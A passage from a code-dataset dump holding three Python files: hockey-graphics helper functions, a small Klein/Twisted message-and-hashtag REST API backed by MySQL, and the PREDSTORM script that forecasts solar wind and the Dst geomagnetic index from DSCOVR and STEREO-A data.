4:\n start_val = 3600000\n end_val = 3900000\n else:\n start_val = (period - 1) * 1200000\n end_val = period * 1200000\n\n return (start_val, end_val)\n\ndef random_file_pick(logger, path):\n \"\"\" pick random file from directory \"\"\"\n logger.debug('random_file_pick({0})'.format(path))\n file = random.choice(os.listdir(path))\n print(file)\n\ndef bg_image_select(logger, bg_image_list):\n \"\"\" bg image selection \"\"\"\n logger.debug('bg_image_select()')\n if bg_image_list:\n logger.debug('_bg_image_select(): pick team specific background image')\n file_name = 'img/backgrounds/{0}'.format(random.choice(bg_image_list))\n else:\n # generate random background image\n file_name = 'img/backgrounds/{0}.png'.format(random.randint(1,7))\n\n return file_name\n\ndef position_get(logger, position):\n \"\"\" get position \"\"\"\n\n position_dic = {\n 'GK': 'GK',\n 'FO': 'FO',\n 'CE': 'FO',\n 'LW': 'FO',\n 'RW': 'FO',\n 'LD': 'DE',\n 'RD': 'DE',\n 'DE': 'DE'\n }\n\n if position in position_dic:\n result = position_dic[position]\n else:\n result = 'UNK'\n\n return result\n\ndef region_get(logger, country):\n \"\"\" get region GER/NAM/OTHER \"\"\"\n region_dic = {\n 'GER': 'GER',\n 'CAN':'NAM',\n 'USA': 'NAM'\n }\n\n if country not in region_dic:\n result = 'Others'\n else:\n result = region_dic[country]\n\n return result","repo_name":"grindsa/hockey_graphs","sub_path":"rest/functions/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":15100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26558443202","text":"import config\nfrom helper import rest_api_json, get_json_arg\nfrom error import Unauthorized\n\nimport uuid\nfrom datetime import datetime\nfrom klein import run, route\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.sql import text\nfrom twisted.python import log\n\n\ndb_path = 'mysql://{}:{}@{}/{}'.format(config.db_user, config.db_pass,\n config.db_host, config.db_name)\nengine = create_engine(db_path, execution_options={'autocommit': True})\ndb_connection = engine.connect()\n\n\n@route('/v1/messages', methods=['POST'])\n@rest_api_json\ndef messages(json):\n user_id = get_json_arg(json, 'user_id')\n message = get_json_arg(json, 'message')\n\n log.msg('Inserting message for user '+user_id)\n\n # check for message length\n if len(message) > config.message_size_limit:\n raise MethodNotAllowed('Message size bigger than limit '+config.message_size_limit)\n\n # extract tags\n tags = {tag.strip(\"#\") for tag in message.split() if tag.startswith(\"#\")}\n log.msg('Found tags: '+str(tags))\n\n\n with db_connection.begin() as db_trans:\n\n # check if user exist\n if db_connection.execute(text('SELECT id FROM users WHERE id = :id'),id=user_id).fetchone() is None:\n raise Unauthorized('User not authorized')\n\n # insert message\n message_id = uuid.uuid4()\n db_connection.execute(text('INSERT INTO messages (id, user_id, message_text, message_time) '\\\n 'VALUES (:message_id, :user_id, :message, CURRENT_TIMESTAMP(6))'),\n message_id=str(message_id), user_id=user_id, message=message)\n\n # insert tags\n for tag in tags:\n tag_id = uuid.uuid4()\n db_connection.execute(text('INSERT INTO tags (id, tag_name) '\\\n 'VALUES (:tag_id, :tag_name)'),\n tag_id=str(tag_id), tag_name=tag)\n\n db_connection.execute(text('INSERT INTO message_tag (message_id, tag_id) '\\\n 'VALUES (:message_id, :tag_id)'),\n message_id=str(message_id), tag_id=str(tag_id))\n\n\n return { 'status': 'ok', 'id': str(message_id) }\n\n\n@route('/v1/messages/tags', methods=['GET'])\n@rest_api_json\ndef tag(json):\n tag_name = get_json_arg(json, 'tag_name')\n\n if 'start_time' in json:\n start_time = get_json_arg(json, 'start_time')\n else:\n start_time = str(datetime.today())\n\n if 'offset' in json:\n offset = get_json_arg(json, 'offset')\n else:\n offset = 0\n\n if 'limit' in json:\n limit = get_json_arg(json, 'limit')\n else:\n limit = 20\n\n log.msg(start_time)\n log.msg(offset)\n log.msg(limit)\n\n result = db_connection.execute(text('SELECT users.user_name, messages.message_text, messages.message_time FROM messages '\\\n 'INNER JOIN message_tag ON message_tag.message_id = messages.id '\\\n 'INNER JOIN tags ON message_tag.tag_id = tags.id '\\\n 'INNER JOIN users ON messages.user_id = users.id '\\\n 'WHERE tags.tag_name = :tag_name '\\\n 'AND messages.message_time < :start_time '\\\n 'ORDER BY messages.message_time DESC '\\\n 'LIMIT :limit OFFSET :offset'),\n tag_name=tag_name, start_time=start_time, limit=limit, offset=offset).fetchall()\n\n log.msg(result)\n\n return [dict(r) for r in result]\n\n\n\nif __name__ == '__main__':\n run(config.bind_address, config.bind_port)\n","repo_name":"mmarzec/twistter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14730314303","text":"import os\nimport sys\nimport copy\nimport getopt\nimport shutil\n\n# Load config file\nimport configparser\nconfig = configparser.ConfigParser()\n\nmyopts, args = getopt.getopt(sys.argv[1:],\"hv=\", ['config=',\"server\", \"help\", \"historic=\", \"verbose=\",\n \"use3DCORE=\", \"validation\", \"force-stereoa\"])\nconfig_path = \"config.ini\"\nfor opt, arg in myopts:\n if opt == '--config': # Define path for config\n config_path = arg\n\nconfig.read(config_path)\n\n# READ INPUT OPTIONS FROM COMMAND LINE\nargv = sys.argv[1:]\n\nserver = False\nif \"--server\" in [o for o, v in myopts]:\n server = True\n print(\"In server mode!\")\n\nimport matplotlib\n#if server:\nmatplotlib.use('Agg') # important for server version, otherwise error when making figures\n#else:\n# matplotlib.use('Qt5Agg') # figures are shown on mac\n\nfrom datetime import datetime, timedelta\nimport h5py\nimport logging\nimport logging.config\nimport matplotlib.pyplot as plt\nfrom matplotlib.dates import num2date, date2num, DateFormatter\nimport numpy as np\nimport pdb\nimport pickle\nimport scipy.io\nimport seaborn as sns\nimport urllib\n\n# Local imports\nimport predstorm as ps\nfrom predstorm.config.constants import AU, dist_to_L1\nfrom predstorm.config import plotting as pltcfg\nfrom predstorm.plot import plot_solarwind_and_dst_prediction, plot_solarwind_science\nfrom predstorm.plot import plot_solarwind_pretty\nfrom predstorm.predict import dst_loss_function\n\n#========================================================================================\n#--------------------------------- MAIN SCRIPT ------------------------------------------\n#========================================================================================\n\ndef main():\n \"\"\"The main code.\"\"\"\n\n # General variables:\n tstr_format = \"%Y-%m-%dT%H%M\" #formerly \"%Y-%m-%d-%H_%M\"\n use_recurrence_model = False\n plot_past_days = float(config['RealTimePred']['PlotPastDays'])\n plot_future_days = float(config['RealTimePred']['PlotFutureDays'])\n save_future_days = float(config['RealTimePred']['SaveFutureDays'])\n data_src_future = config['RealTimePred']['FutureSource'].upper()\n if data_src_future == 'RECURRENCE':\n use_recurrence_model = True\n else:\n use_recurrence_model = False\n\n # Define timing variables:\n timenow = datetime.utcnow()\n if run_mode == 'normal':\n timestamp = timenow\n timestampstr = datetime.strftime(timestamp, tstr_format) # timeutcstr\n timenowstr = datetime.strftime(timenow, tstr_format)\n datestr = datetime.strftime(timenow, '%Y-%m-%d')\n use_realtime = (timenow - timestamp).days < (7.-plot_past_days)\n\n predstorm_header = ''\n predstorm_header += '\\n------------------------------------------------------------------------\\n'\n predstorm_header += '\\n'\n predstorm_header += 'PREDSTORM L5 v1 method for geomagnetic storm and aurora forecasting. \\n'\n predstorm_header += 'Created by Helio4Cast Group, Graz, last update September 2020.\\n'\n predstorm_header += '\\n'\n predstorm_header += 'Time shifting magnetic field and plasma data from STEREO-A, \\n'\n predstorm_header += 'or from an L5 mission or interplanetary CubeSats, to predict\\n'\n predstorm_header += 'the solar wind at Earth and the Dst index for magnetic storm strength.\\n'\n predstorm_header += '\\n'\n predstorm_header += '\\n'\n predstorm_header += '------------------------------------------------------------------------'\n logger.info(predstorm_header)\n logger.info(\"Starting PREDSTORM_L5 script. Running in mode {} with timestamp {}\".format(run_mode.upper(),\n timestampstr))\n\n #================================== (1) GET DATA ========================================\n\n logger.info(\"\\n-------------------------\\nDATA READS\\n-------------------------\")\n\n #------------------------ (1a) Get real-time DSCOVR data --------------------------------\n\n logger.info(\"(1) Getting L1 data...\")\n if use_realtime:\n # If recent, use real-time data:\n dism = ps.get_noaa_realtime_data()\n dism = dism.cut(endtime=timestamp)\n else:\n # If older timestamp, source from online archive:\n logger.info(\"Using archived DSCOVR data\")\n dism = ps.get_dscovr_data(starttime=timestamp-timedelta(days=plot_past_days+1),\n endtime=timestamp)\n time_last_rtsw = num2date(dism['time'][-1]).replace(tzinfo=None) # original timenow\n\n # Linearly interpolate over NaNs and resample to hourly data:\n dism.interp_nans()\n sw_past_min = dism\n sw_past = dism.make_hourly_data()\n\n logger.info('Current time (UTC):')\n logger.info('\\t{}'.format(timenow))\n logger.info('Time of last datapoint in NOAA real-time data (UTC):')\n logger.info('\\t{}'.format(time_last_rtsw))\n logger.info('Time lag in minutes: {:.0f}'.format(np.round((timenow-time_last_rtsw).seconds/60., 0)))\n\n #------------------------ (1b) Get real-time STEREO-A beacon data -----------------------\n\n logger.info(\"(2) Getting STEREO-A data...\")\n\n if not use_recurrence_model:\n # Estimate lag between STEREO-A measurements and Earth:\n lag_sta_L1, lag_sta_r = ps.get_time_lag_wrt_earth(timestamp=timestamp, satname='STEREO-A')\n est_timelag = lag_sta_L1 + lag_sta_r\n # Find the number of days to plot into future (reduces as ST-A comes closer):\n plot_future_days = min([est_timelag, plot_future_days])\n stereo_start = timestamp - timedelta(days=plot_future_days+7)\n logger.info(\"From STEREO-A position, plotting {:.1f} days in the past and {:.1f} days into the future.\".format(\n plot_past_days, plot_future_days))\n else:\n stereo_start = timestamp\n\n # Read data:\n try:\n stam = ps.get_stereo_beacon_data(starttime=stereo_start, endtime=timestamp+timedelta(minutes=1))\n if stam.h['PlasmaDataIntegrity'] == 0: # very low quality data\n if force_stereoa:\n logger.warning(\"STEREO-A data has low data quality but using data anyway.\")\n else:\n raise Exception(\"Very low STEREO-A data quality!\")\n if len(np.where(np.isnan(stam['speed']))[0]) > len(stam)/2:\n if force_stereoa:\n logger.warning(\"STEREO-A data is {:.1f}% nans but using data anyway.\".format(len(np.where(np.isnan(stam['speed']))[0])/len(stam)*100.))\n else:\n raise Exception(\"STEREO-A data is {:.1f}% nans!\".format(len(np.where(np.isnan(stam['speed']))[0])/len(stam)*100.))\n nan_periods = stam.find_nan_periods()\n stam = stam.interp_nans()\n stam.load_positions()\n sta_details = stam.return_position_details(timestamp)\n except Exception as e:\n logger.info(\"STEREO-A read failed for reason: {}\".format(e))\n use_recurrence_model = True\n\n # If reading STEREO-A failed, take day from 27-day recurrence model instead:\n if not os.path.exists(\"data\"):\n os.mkdir(\"data\")\n if run_mode == 'normal' and use_recurrence_model:\n logger.info(\"STEREO-A plasma data is missing/corrupted, using 27-day recurrence model for plasma data instead!\")\n rec_start = timestamp - timedelta(days=27)\n rec_end = timestamp - timedelta(days=27-save_future_days)\n pers27_path = os.path.join(inputpath, \"rtsw_min_last100days.h5\")\n sw_future_min = ps.get_rtsw_archive_data(pers27_path)\n tlast_recurrence = num2date(sw_future_min['time'][-1])\n logger.info(\"Data runs from {} to {}\".format(num2date(sw_future_min['time'][0]), tlast_recurrence))\n sw_future_min.cut(starttime=rec_start, endtime=rec_end)\n sw_future_min['time'] += 27. # correct by one Carrington rotation\n sw_future_min.h['DataSource'] += ' t+27days'\n sw_future_min.source += '+27days'\n shifted_nan_periods = sw_future_min.find_nan_periods()\n\n # Make sure last data point is after current date\n if len(sw_future_min['time']) == 0:\n raise Exception(\"The file rtsw_min_last100days.h5 foes not contain enough data for using recurrence!\")\n\n if not use_recurrence_model:\n time_last_sta = num2date(stam['time'][-1]).replace(tzinfo=None)\n logger.info('Time of last datapoint in STEREO-A data (UTC):')\n logger.info('\\t{}'.format(time_last_sta))\n logger.info('Time lag in minutes: {:.0f}'.format(np.round((timenow - time_last_sta).seconds/60., 0)))\n\n #------------------------- (1c) Load NOAA Dst for comparison ----------------------------\n\n logger.info(\"(3) Getting Kyoto Dst data...\")\n if use_realtime:\n dst = ps.get_noaa_dst()\n else:\n dst = ps.get_past_dst(filepath=\"dstarchive/WWW_dstae00010670.dat\",\n starttime=num2date(timestamp)-timedelta(days=plot_past_days+1),\n endtime=num2date(timestamp))\n if len(dst) == 0.:\n raise Exception(\"Kyoto Dst data for historic mode is missing! Go to http://wdc.kugi.kyoto-u.ac.jp/dstae/index.html\")\n dst = dst.cut(endtime=timestamp)\n\n #------------------------- (1d) Load 3DCORE output if available -------------------------\n\n if use3DCORE:\n logger.info(\"(4) Reading 3DCORE flux rope output...\")\n fr_t_m, fr_B_m, fr_t, fr_B = ps.get_3DCORE_output(path_3DCORE)\n else:\n fr_t_m = []\n\n #========================== (2) PREDICTION CALCULATIONS ==================================\n\n #------------------------ (2a) Corrections to time-shifted STEREO-A data ----------------\n\n if not use_recurrence_model:\n logger.info(\"\\n-------------------------\\nL5-to-L1 MAPPING\\n-------------------------\")\n logger.info(\"Applying corrections to STEREO-A data...\")\n\n logger.info(\"(1) Shift time at STEREO-A according to solar wind rotation\")\n stam.shift_time_to_L1()\n logger.info(\"STA-to-L1 adjusted time of last datapoint in STEREO-A:\")\n logger.info(\"\\t{}\".format(num2date(stam['time'][-1])))\n\n logger.info(\"(2) Make correction for difference in heliocentric distance\")\n stam.shift_wind_to_L1()\n\n logger.info(\"(3) Conversion from RTN to GSE and then to GSM as if STEREO was on Sun-Earth line\")\n stam['bx'], stam['by'], stam['bz'] = stam['br'], -stam['bt'], stam['bn'] # RTN to quasi-GSE\n stam.convert_GSE_to_GSM()\n sw_future = stam.make_hourly_data()\n sw_future_min = stam\n\n # Calculate shifts for NaN periods in STA data:\n shifted_nan_periods = {}\n for key in nan_periods:\n shifted_nan_periods[key] = []\n for times in nan_periods[key]:\n starttime, endtime = times\n lag_sta_L1, lag_sta_r = ps.get_time_lag_wrt_earth(timestamp=num2date(starttime), satname='STEREO-A')\n shifted_start = starttime + lag_sta_L1 + lag_sta_r\n lag_sta_L1, lag_sta_r = ps.get_time_lag_wrt_earth(timestamp=num2date(endtime), satname='STEREO-A')\n shifted_end = endtime + lag_sta_L1 + lag_sta_r\n shifted_nan_periods[key].append([shifted_start, shifted_end])\n\n else:\n # Assign 27-day recurrence L1 data variables to new keys:\n sw_future_min.vars += ['br', 'bt', 'bn']\n sw_future_min['br'], sw_future_min['bt'], sw_future_min['bn'] = sw_future_min['bx'], sw_future_min['by'], sw_future_min['bz']\n sw_future_min = sw_future_min.interp_nans()\n sw_future = sw_future_min.make_hourly_data()\n\n #-------------------------- (2b) Take flux rope data from 3DCORE ------------------------\n\n if use3DCORE:\n logger.info(\"(!) Filling prediction with flux rope values from 3DCORE\")\n # Interpolate minute values to match STEREO values:\n sw_f_times = sw_future_min['time'][np.logical_and(sw_future_min['time'] >= fr_t_m[0], sw_future_min['time'] <= fr_t_m[-1])]\n for ib, bn in enumerate(fr_B_m):\n fr_B_m[ib] = np.interp(sw_f_times, fr_t_m, fr_B_m[ib])\n # Minute:\n sw_future_min['bx'][np.logical_and(sw_future_min['time'] >= fr_t_m[0], sw_future_min['time'] <= fr_t_m[-1])] = fr_B_m[0]\n sw_future_min['by'][np.logical_and(sw_future_min['time'] >= fr_t_m[0], sw_future_min['time'] <= fr_t_m[-1])] = fr_B_m[1]\n sw_future_min['bz'][np.logical_and(sw_future_min['time'] >= fr_t_m[0], sw_future_min['time'] <= fr_t_m[-1])] = fr_B_m[2]\n sw_future_min['bn'][np.logical_and(sw_future_min['time'] >= fr_t_m[0], sw_future_min['time'] <= fr_t_m[-1])] = fr_B_m[2]\n # Hourly:\n sw_future['bx'][np.logical_and(sw_future['time'] >= fr_t[0], sw_future['time'] <= fr_t[-1])] = fr_B[0]\n sw_future['by'][np.logical_and(sw_future['time'] >= fr_t[0], sw_future['time'] <= fr_t[-1])] = fr_B[1]\n sw_future['bz'][np.logical_and(sw_future['time'] >= fr_t[0], sw_future['time'] <= fr_t[-1])] = fr_B[2]\n # Recalculate total B-field:\n sw_future_min['btot'] = np.sqrt(sw_future_min['bx']**2. + sw_future_min['by']**2. + sw_future_min['bz']**2.)\n sw_future['btot'] = np.sqrt(sw_future['bx']**2. + sw_future['by']**2. + sw_future['bz']**2.)\n\n #------------------- (2c) COMBINE DSCOVR and time-shifted L5/PERS data ------------------\n\n sw_merged = ps.merge_Data(sw_past, sw_future)\n try:\n sw_merged_min = ps.merge_Data(sw_past_min, sw_future_min)\n savemindata = True\n except:\n logger.warning(\"No minute data available.\")\n savemindata = False\n\n #---------------------- (2d) calculate Dst for combined data ----------------------------\n\n logger.info(\"\\n-------------------------\\nINDEX PREDICTIONS\\n-------------------------\")\n logger.info('Making index predictions for L1')\n\n # Predict Kp\n kp_newell = sw_merged.make_kp_prediction()\n # Predict Auroral Power\n aurora_power = sw_merged.make_aurora_power_prediction()\n # Calculate Newell coupling parameter\n newell_coupling = sw_merged.get_newell_coupling()\n\n dst_method = config['RealTimePred']['DstPredMethod']\n dst_offset = float(config['RealTimePred']['DstOffset'])\n dst_model_path = config['RealTimePred']['DstModelPath']\n\n # Predict Dst from L1 and STEREO-A:\n if dst_method == 'temerin_li':\n dst_pred = sw_merged.make_dst_prediction()\n dst_label = 'Dst Temerin & Li 2002'\n dst_pred['dst'] = dst_pred['dst'] + dst_offset\n elif dst_method == 'temerin_li_2006':\n dst_pred = sw_merged.make_dst_prediction(method='temerin_li_2006', t_correction=True)\n dst_label = 'Dst Temerin & Li 2006'\n dst_pred['dst'] = dst_pred['dst'] + dst_offset\n elif dst_method == 'obrien':\n dst_pred = sw_merged.make_dst_prediction(method='obrien')\n dst_label = 'Dst OBrien & McPherron 2000'\n dst_pred['dst'] = dst_pred['dst'] + dst_offset\n elif dst_method == 'burton':\n dst_pred = sw_merged.make_dst_prediction(method='burton')\n dst_label = 'Dst Burton et al. 1975'\n dst_pred['dst'] = dst_pred['dst'] + dst_offset\n elif dst_method.startswith('ml'):\n with open(dst_model_path, 'rb') as f:\n model = pickle.load(f)\n dst_pred = sw_merged.make_dst_prediction_from_model(model)\n if dst_method == 'ml_dstdiff':\n dst_tl = sw_merged.make_dst_prediction(method='temerin_li_2006', t_correction=True)\n dst_pred['dst'] = dst_tl['dst'] + dst_pred['dst'] + dst_offset\n dst_label = 'Dst predicted using ML (GBR)'\n\n # Combine in data object:\n sw_merged['dst'] = dst_pred['dst']\n sw_merged['kp'] = kp_newell['kp']\n sw_merged['aurora'] = aurora_power['aurora']\n sw_merged['ec'] = newell_coupling['ec']\n\n #========================== (3) PLOT RESULTS ============================================\n\n # Make reduced copies to make plotting and min/max setting easier:\n sw_future_min_plot = copy.deepcopy(sw_future_min)\n sw_future_plot = copy.deepcopy(sw_future)\n plot_start = timestamp\n plot_end = timestamp + timedelta(save_future_days)\n sw_future_min_plot.cut(starttime=plot_start, endtime=plot_end)\n sw_future_plot.cut(starttime=plot_start, endtime=plot_end)\n\n # Archive paths\n savepath_archive_plt = os.path.join(savepath_archive, 'plots')\n savepath_archive_txt = os.path.join(savepath_archive, 'text')\n\n logger.info(\"\\n-------------------------\\nPLOTTING\\n-------------------------\")\n # ********************************************************************\n logger.info(\"Creating output plots...\")\n realtime_plot_path = os.path.join(savepath_rt,'predstorm_real.png')\n plot_solarwind_and_dst_prediction([sw_past_min, sw_past], [sw_future_min_plot, sw_future_plot], \n dst, dst_pred,\n newell_coupling=newell_coupling,\n past_days=plot_past_days,\n future_days=plot_future_days,\n dst_label=dst_label,\n timestamp=timestamp,\n times_3DCORE=fr_t_m,\n times_nans=shifted_nan_periods,\n plot_path=realtime_plot_path)\n plt.close()\n\n archive_plot_path = os.path.join(savepath_archive_plt,'predstorm_v1_realtime_{}.png'.format(\n datetime.strftime(timestamp, \"%Y-%m-%d\")))\n shutil.copyfile(realtime_plot_path, archive_plot_path)\n\n science_plot_path = os.path.join(savepath_rt,'predstorm_science.png')\n plot_solarwind_science([sw_past_min, sw_past], [sw_future_min, sw_future], \n timestamp=timestamp,\n past_days=plot_past_days,\n future_days=plot_future_days,\n plot_path=science_plot_path)\n\n try:\n pretty_plot_path = os.path.join(savepath_rt,'predstorm_pretty.png')\n plot_solarwind_pretty(sw_past, sw_future, dst_pred, newell_coupling, timestamp,\n plot_path=pretty_plot_path)\n except Exception as e:\n logger.warning(\"Could not run plot_solarwind_pretty() due to error: {}\".format(e))\n # ********************************************************************\n\n\n #========================== (4) WRITE OUT RESULTS AND VARIABLES =========================\n\n #-------------- (4a) Write prediction variables (plot) to pickle and txt ASCII file -----\n\n logger.info(\"\\n-------------------------\\nWRITING RESULTS\\n-------------------------\")\n\n # Realtime 1-hour data:\n ps.save_to_file(os.path.join(savepath_rt,'predstorm_real.txt'), wind=sw_merged, dst=dst_pred,\n kp=kp_newell, aurora=aurora_power, ec=newell_coupling)\n # Realtime 1-min data:\n if savemindata:\n ps.save_to_file(os.path.join(savepath_rt,'predstorm_real_1m.txt'), wind=sw_merged_min,\n dst=dst_pred.interp_to_time(sw_merged_min['time']),\n kp=kp_newell.interp_to_time(sw_merged_min['time']),\n aurora=aurora_power.interp_to_time(sw_merged_min['time']),\n ec=newell_coupling.interp_to_time(sw_merged_min['time']))\n\n archive_data_path_1m = os.path.join(savepath_archive_txt,'predstorm_v1_realtime_1m_{}.txt'.format(\n datetime.strftime(timestamp, \"%Y-%m-%d\")))\n archive_data_path_1h = archive_data_path_1m.replace('1m', '1h')\n shutil.copyfile(os.path.join(savepath_rt,'predstorm_real.txt'), archive_data_path_1h)\n shutil.copyfile(os.path.join(savepath_rt,'predstorm_real_1m.txt'), archive_data_path_1m)\n\n past_100days = timenow - timedelta(days=100)\n\n # Data for archiving (past 100 days):\n if run_mode == 'normal':\n pickled_forecasts = os.path.join(inputpath, \"past_100days_running_forecasts.p\")\n if not os.path.exists(pickled_forecasts):\n forecasts = sw_merged.data\n forecasts = forecasts[:, forecasts[0] > date2num(timestamp)]\n logger.info(\"Creating new 100-day file for saving forecasts under {}\".format(pickled_forecasts))\n recurr = np.full((1, forecasts.shape[1]), use_recurrence_model) # column defining which input was used\n forecasts = np.vstack((forecasts, recurr))\n else:\n with open(pickled_forecasts, 'rb') as f:\n past_forecasts = pickle.load(f)\n new_forecasts = sw_merged.data\n new_forecasts = new_forecasts[:, new_forecasts[0] > past_forecasts[0][-1]]\n recurr = np.full((1, new_forecasts.shape[1]), use_recurrence_model)\n new_forecasts = np.vstack((new_forecasts, recurr))\n forecasts = np.hstack((past_forecasts, new_forecasts))\n logger.info(\"Last {} value at {}, adding {} new value(s).\".format(pickled_forecasts, num2date(past_forecasts[0][-1]), new_forecasts.shape[1]))\n with open(pickled_forecasts, \"wb\") as f:\n pickle.dump(forecasts, f)\n\n # Standard data:\n filename_save = os.path.join(savepath_archive_txt, 'predstorm_v1_realtime_stereo_a_save_{}.txt'.format(datestr))\n ps.save_to_file(filename_save, wind=sw_merged, dst=dst_pred, kp=kp_newell, aurora=aurora_power, ec=newell_coupling)\n logger.info('Variables saved in TXT form: '+filename_save)\n\n\n #========================== (5) CARRY OUT VALIDATION ====================================\n\n #----------------------------- (4b) CALCULATE FORECAST RESULTS --------------------------\n\n if not use_recurrence_model:\n logger.info(\"\\n\\nSATELLITE POSITION DETAILS\\n--------------------------\\n\"+sta_details)\n\n future_times = np.where(sw_merged['time'] > date2num(timestamp))\n past_times = np.where(sw_merged['time'] < date2num(timestamp))\n\n min_cut = np.max((dst['time'][0], sw_merged['time'][0]))\n max_cut = np.min((dst['time'][-1], sw_merged['time'][-1]))\n dst_cut = dst['dst'][np.logical_and(dst['time'] > min_cut, dst['time'] < max_cut)]\n dst_pred_cut = dst_pred['dst'][np.logical_and(dst_pred['time'] > min_cut, dst_pred['time'] < max_cut)]\n results_str = ''\n\n if len(dst_cut) == len(dst_pred_cut):\n #----------------------------- (4c) GOODNESS METRICS --------------------------\n scores = ps.predict.get_scores(dst_cut, dst_pred_cut, dst['time'][np.logical_and(dst['time'] > min_cut, dst['time'] < max_cut)],\n printtext=verbose)\n results_str += 'SCORING\\n-------\\n'\n results_str += 'MAE of real Dst to Dst forecast:\\t{:.2f} nT\\n'.format(scores['mae'])\n results_str += 'Diff of real Dst to Dst forecast:\\t{:.2f} +/- {:.2f} nT\\n'.format(scores['diff_mean'], scores['diff_std'])\n results_str += 'Correlation of forecast in time:\\t{:.2f}\\n'.format(scores['ppmc'])\n results_str += 'Best correlation of forecast in time:\\t{}\\n'.format(scores['xcorr_max'])\n results_str += 'Best correlation time difference:\\t{} hours\\n'.format(scores['xcorr_offset'])\n results_str += '\\n'\n else: # TODO: handle mismatching Dst sizes\n logger.warning(\"Dst (past) sizes are mismatched with {} and {}\".format(len(dst_cut), len(dst_pred_cut)))\n\n #----------------------------- (4d) RESULTS OF DST PREDICTION --------------------------\n results_str += 'PREDSTORM L5 (STEREO-A) DST PREDICTION RESULTS\\n----------------------------------------------\\n'\n\n mindst_time = dst['time'][np.nanargmin(dst['dst'])]\n mindst_predp_time = dst_pred['time'][np.nanargmin(dst_pred['dst'][past_times])]\n results_str += 'Dst minimum:\\n'\n results_str += \"\\tReal: \\t{:.1f} nT\\t at {}\\n\".format(np.nanmin(dst['dst']), str(num2date(mindst_time))[0:16])\n results_str += \"\\tForecast:\\t{:.1f} nT\\t at {}\\n\".format(np.nanmin(dst_pred['dst'][past_times]), str(num2date(mindst_predp_time))[0:16])\n results_str += '\\n'\n\n mindst_predf_time = dst_pred['time'][np.nanargmin(dst_pred['dst'][future_times])]\n results_str += 'Predicted Dst minimum:\\n'\n results_str += \"\\tForecast:\\t{:.1f} nT\\tat {}\\n\".format(np.nanmin(dst_pred['dst'][future_times]), str(num2date(mindst_predf_time))[0:16])\n results_str += '\\n'\n\n for dstlims in [[-50,-100], [-100,-200], [-200,-2000]]:\n results_str += 'Predicted times of moderate storm levels (-50 to -100 nT):\\n'\n storm_times_ind = np.where(np.logical_and(dst_pred['dst'][future_times] < dstlims[0], dst_pred['dst'][future_times] > dstlims[1]))[0]\n if len(storm_times_ind) > 0:\n for i in np.arange(0,len(storm_times_ind),1):\n results_str += '\\t{}\\n'.format(str(num2date(sw_merged['time'][future_times][storm_times_ind][i]))[0:16])\n else:\n results_str += '\\tNone\\n'\n results_str += '\\n'\n\n #----------------------------- (4e) DATA ON SOLAR WIND VALUES --------------------------\n results_str += 'SOLAR WIND PARAMETERS\\n---------------------\\n'\n\n for var, unit in zip(['speed', 'btot'], ['km/s', 'nT ']):\n maxvar_time = sw_merged['time'][past_times[0][0]+np.nanargmax(sw_merged[var][past_times])]\n results_str += 'Maximum {}:\\n'.format(var)\n results_str += \"\\tPast: \\t{:.1f} {} \\t at {}\\n\".format(np.nanmax(sw_merged[var][past_times]), unit, str(num2date(maxvar_time+1/(24*60)))[0:16])\n maxvar_time = sw_merged['time'][future_times[0][0]+np.nanargmax(sw_merged[var][future_times])]\n results_str += \"\\tForecast:\\t{:.1f} {} \\t at {}\\n\".format(np.nanmax(sw_merged[var][future_times]), unit, str(num2date(maxvar_time+1/(24*60)))[0:16])\n results_str += '\\n'\n\n var = 'bz'\n minvar_time = sw_merged['time'][past_times[0][0]+np.nanargmin(sw_merged[var][past_times])]\n results_str += 'Minimum {}:\\n'.format(var)\n results_str += \"\\tPast: \\t{:.1f} {} \\t at {}\\n\".format(np.nanmin(sw_merged[var][past_times]), unit, str(num2date(minvar_time+1/(24*60)))[0:16])\n minvar_time = sw_merged['time'][future_times[0][0]+np.nanargmin(sw_merged[var][future_times])]\n results_str += \"\\tForecast:\\t{:.1f} {} \\t at {}\\n\".format(np.nanmin(sw_merged[var][future_times]), unit, str(num2date(minvar_time+1/(24*60)))[0:16])\n results_str += '\\n'\n\n logger.info(\"Final results:\\n\\n\"+results_str)\n\n #------------------------------- (4f) PLOT SOME BASIC STATS -------------------------\n try:\n fig, (axes) = plt.subplots(1, 3, figsize=(15, 5))\n # Plot of correlation between values\n axes[0].plot(dst_pred_cut, dst_cut, 'x')\n axes[0].set_title(\"Real vs. forecast Dst\")\n axes[0].set_xlabel(\"Forecast Dst [nT]\")\n axes[0].set_ylabel(\"Kyoto Dst [nT]\")\n\n # Histogram of forecast\n n, bins, patches = axes[1].hist(dst_pred['dst'], 20)\n axes[1].set_title(\"Histogram of forecast Dst\")\n axes[1].set_xlim([30, -200])\n axes[1].set_xlabel(\"Forecast Dst [nT]\")\n\n plt.suptitle(\"\")\n plt.savefig(os.path.join(savepath_rt, 'predstorm_stats.png'))\n except:\n pass\n\n\ndef validation(look_back=40):\n \"\"\"Carries out validation for past month of data.\"\"\"\n\n import seaborn as sns\n sns.set_style('darkgrid')\n\n now = datetime.utcnow()\n\n lw = pltcfg.lw\n\n pickled_forecasts = \"data/past_100days_running_forecasts.p\" # correct without leo later\n if not os.path.exists(pickled_forecasts):\n raise Exception(\"Cannot carry out validation without past saved values! \\\n Make sure the file {} is being written.\".format(pickled_forecasts))\n\n with open(pickled_forecasts, 'rb') as f:\n past_forecasts = pickle.load(f)\n\n sw_validation = ps.SatData({'time': past_forecasts[0]})\n sw_validation.data = past_forecasts[:-1]\n sw_validation.vars = ['bz', 'btot', 'speed', 'density', 'dst', 'aurora', 'kp', 'ec', 'ae']\n sw_validation['ae'] = past_forecasts[-1]\n sw_validation = sw_validation.make_hourly_data()\n sw_validation = sw_validation.cut(starttime=now-timedelta(days=look_back), endtime=now)\n\n # Read 27-day recurrence data:\n pers27_path = \"data/rtsw_hour_last100days.h5\"\n kyoto_dst = ps.get_rtsw_archive_data(pers27_path, add_dst=True)\n kyoto_dst = kyoto_dst.interp_to_time(sw_validation['time'])\n pers27_path_min = \"data/rtsw_min_last100days.h5\"\n sw_recurrence = ps.get_rtsw_archive_data(pers27_path_min)\n sw_recurrence = sw_recurrence.make_hourly_data()\n sw_recurrence['time'] += 27. # correct by one Carrington rotation\n sw_recurrence.h['DataSource'] += ' t+27days'\n 